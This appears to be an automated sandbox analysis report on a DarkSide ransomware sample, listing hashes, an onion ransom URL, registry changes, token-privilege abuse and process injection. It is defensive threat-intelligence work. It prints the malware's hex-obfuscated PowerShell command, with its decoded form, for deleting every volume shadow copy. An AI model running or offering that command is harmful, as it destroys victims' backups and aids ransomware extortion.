Analysis

max time kernel: 118s
max time network: 123s
platform: windows7_x64
resource: win7-20240708-en
resource tags: arch:x64 arch:x86 image:win7-20240708-en locale:en-us os:windows7-x64 system
submitted: 28-07-2024 02:28

Static task: static1

Behavioral task: behavioral1
  Sample: a48af4ad3eddc63e3c079a43fd3b45d5fa66fe22c78f32f97285c428d1f1f774.exe
  Resource: win7-20240708-en

Behavioral task: behavioral2
  Sample: a48af4ad3eddc63e3c079a43fd3b45d5fa66fe22c78f32f97285c428d1f1f774.exe
  Resource: win10v2004-20240709-en
General

Target: a48af4ad3eddc63e3c079a43fd3b45d5fa66fe22c78f32f97285c428d1f1f774.exe
Size: 166KB
MD5: be1c18efa764b1b32421b6beb57cd3e9
SHA1: 9fff40b4653ab368e04e398d9c54a1aa3a320d49
SHA256: a48af4ad3eddc63e3c079a43fd3b45d5fa66fe22c78f32f97285c428d1f1f774
SHA512: f35e3f123f4b0378626de52035390d2b8c9cf42f5b1882c66d8a79c58cd798a89506fb402a93a7ceaba1078226d7eba80e9c8a93321fc0a17e4e012fc8b15824
SSDEEP: 3072:o/0Lu+FKdYM69P6padn/DDonc8oOgajAnPvNHwcW0m1QTj:o/d+FKdYMQPrdn/HovAnlwx0cC
Malware Config

Extracted from: C:\Users\Admin\README.6caf1429.TXT
Family: darkside
URL: http://darksidfqzcuhtk2.onion/LYID3U99RAJSTEYEFWS6SLYDGMUXKNAT3OPKN9D56PIGX1QHBU5DHGUN4HGMX2IW
Signatures

DarkSide
Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.

Credentials from Password Stores: Credentials from Web Browsers (1 TTPs)
Malicious access or copy of web browser credential store.

Renames multiple (172) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.

Credentials from Password Stores: Windows Credential Manager (1 TTPs)
Suspicious access to Credentials History.
Executes dropped EXE (1 IoCs)
  pid  | Process
  2800 | azami.exe

Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Command and Scripting Interpreter: PowerShell
  pid  | Process
  2872 | powershell.exe
Sets desktop wallpaper using registry (2 TTPs, 2 IoCs)
  description     | ioc                                                                                                     | Process
  Set value (str) | \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\6caf1429.BMP" | azami.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\6caf1429.BMP" | azami.exe

System Location Discovery: System Language Discovery (1 TTPs, 1 IoCs)
Attempt to gather information about the system language of a victim in order to infer the geographical location of that host.
  description | ioc                                                            | Process
  Key opened  | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language   | azami.exe

Modifies Control Panel (1 IoCs)
  description     | ioc                                                                                                      | Process
  Set value (str) | \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Control Panel\Desktop\WallpaperStyle = "10" | azami.exe

Modifies registry class (5 IoCs)
  description     | ioc                                                                                                        | Process
  Key created     | \REGISTRY\MACHINE\SOFTWARE\Classes\6caf1429                                                                | azami.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\6caf1429\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\6caf1429.ico" | azami.exe
  Key created     | \REGISTRY\MACHINE\SOFTWARE\Classes\.6caf1429                                                               | azami.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.6caf1429\ = "6caf1429"                                                  | azami.exe
  Key created     | \REGISTRY\MACHINE\SOFTWARE\Classes\6caf1429\DefaultIcon                                                    | azami.exe

Suspicious behavior: EnumeratesProcesses (3 IoCs)
  pid  | Process
  2872 | powershell.exe
  2800 | azami.exe
  2800 | azami.exe

Suspicious use of AdjustPrivilegeToken (24 IoCs)
  description                         | pid  | Process
  Token: SeIncreaseQuotaPrivilege     | 2800 | azami.exe
  Token: SeSecurityPrivilege          | 2800 | azami.exe
  Token: SeTakeOwnershipPrivilege     | 2800 | azami.exe
  Token: SeLoadDriverPrivilege        | 2800 | azami.exe
  Token: SeSystemProfilePrivilege     | 2800 | azami.exe
  Token: SeSystemtimePrivilege        | 2800 | azami.exe
  Token: SeProfSingleProcessPrivilege | 2800 | azami.exe
  Token: SeIncBasePriorityPrivilege   | 2800 | azami.exe
  Token: SeCreatePagefilePrivilege    | 2800 | azami.exe
  Token: SeBackupPrivilege            | 2800 | azami.exe
  Token: SeRestorePrivilege           | 2800 | azami.exe
  Token: SeShutdownPrivilege          | 2800 | azami.exe
  Token: SeDebugPrivilege             | 2800 | azami.exe
  Token: SeSystemEnvironmentPrivilege | 2800 | azami.exe
  Token: SeRemoteShutdownPrivilege    | 2800 | azami.exe
  Token: SeUndockPrivilege            | 2800 | azami.exe
  Token: SeManageVolumePrivilege      | 2800 | azami.exe
  Token: 33                           | 2800 | azami.exe
  Token: 34                           | 2800 | azami.exe
  Token: 35                           | 2800 | azami.exe
  Token: SeDebugPrivilege             | 2872 | powershell.exe
  Token: SeBackupPrivilege            | 1492 | vssvc.exe
  Token: SeRestorePrivilege           | 1492 | vssvc.exe
  Token: SeAuditPrivilege             | 1492 | vssvc.exe

Suspicious use of WriteProcessMemory (8 IoCs)
  description                        | pid  | Process                                                                  | procid_target
  PID 2292 wrote to memory of 2800   | 2292 | a48af4ad3eddc63e3c079a43fd3b45d5fa66fe22c78f32f97285c428d1f1f774.exe   | 30
  PID 2292 wrote to memory of 2800   | 2292 | a48af4ad3eddc63e3c079a43fd3b45d5fa66fe22c78f32f97285c428d1f1f774.exe   | 30
  PID 2292 wrote to memory of 2800   | 2292 | a48af4ad3eddc63e3c079a43fd3b45d5fa66fe22c78f32f97285c428d1f1f774.exe   | 30
  PID 2292 wrote to memory of 2800   | 2292 | a48af4ad3eddc63e3c079a43fd3b45d5fa66fe22c78f32f97285c428d1f1f774.exe   | 30
  PID 2800 wrote to memory of 2872   | 2800 | azami.exe                                                                | 32
  PID 2800 wrote to memory of 2872   | 2800 | azami.exe                                                                | 32
  PID 2800 wrote to memory of 2872   | 2800 | azami.exe                                                                | 32
  PID 2800 wrote to memory of 2872   | 2800 | azami.exe                                                                | 32

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes

C:\Users\Admin\AppData\Local\Temp\a48af4ad3eddc63e3c079a43fd3b45d5fa66fe22c78f32f97285c428d1f1f774.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\a48af4ad3eddc63e3c079a43fd3b45d5fa66fe22c78f32f97285c428d1f1f774.exe"
  PID: 2292
  - Suspicious use of WriteProcessMemory

  C:\Users\Admin\AppData\Local\Temp\azami.exe
    Command line: "azami.exe"
    PID: 2800
    - Executes dropped EXE
    - Sets desktop wallpaper using registry
    - System Location Discovery: System Language Discovery
    - Modifies Control Panel
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
      PID: 2872
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      Note: the hex string in this command line decodes byte-for-byte to "Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}", i.e. deletion of every volume shadow copy via WMI, which is what the "Uses Volume Shadow Copy service COM API" signature above and the vssvc.exe activity below reflect.

C:\Windows\system32\vssvc.exe
  Command line: C:\Windows\system32\vssvc.exe
  PID: 1492
  - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15

Credential Access
  Credentials from Password Stores (2)
    Credentials from Web Browsers (1)
    Windows Credential Manager (1)
  Unsecured Credentials (1)
    Credentials In Files (1)
Downloads

Filesize: 59KB
MD5: 0ed51a595631e9b4d60896ab5573332f
SHA1: 7ae73b5e1622049380c9b615ce3b7f636665584b
SHA256: 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60
SHA512: 9bfd6318b120c05d9a42a456511efc59f2be5ad451baa6d19d5de776e2ff74dbee444c85478ee7cfdbf705517cc147cd64c6814965f76c740fe1924594a37cb5

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize: 7KB
MD5: 3b1c5c77c8a45804207e49a2742b5d06
SHA1: af37d23c070c1720e879cc5f10316722df03a60f
SHA256: 835fd0f59f156cbed05b05ff165ce70cce2f7a7574561516f1a6da16a902f044
SHA512: 257d2730647652638de51cd1599d0c9584a516f150bad6628b4a52d93f457290d776a243b0090944f40bbeceff240ab0afec2720e4abd53b1ddae47621ef7bbf

Filesize: 1KB
MD5: d4e176b40c4ea17f4870c34fad926d6e
SHA1: 2cc3e4c6cf00e4a2ac0e16e9f7b0ccf2421b92e0
SHA256: 7ee422c323ddbda59934ed7bfa6217cfe06bdb50165b7d4b6115475f1df7af0c
SHA512: feaa913ae99db210db088423a9813e1efedd89d80817bf485a4d9f8ea349b86932ac16ba0473bd224ff150603507bd289d01aebc1a702372a076a167b632f471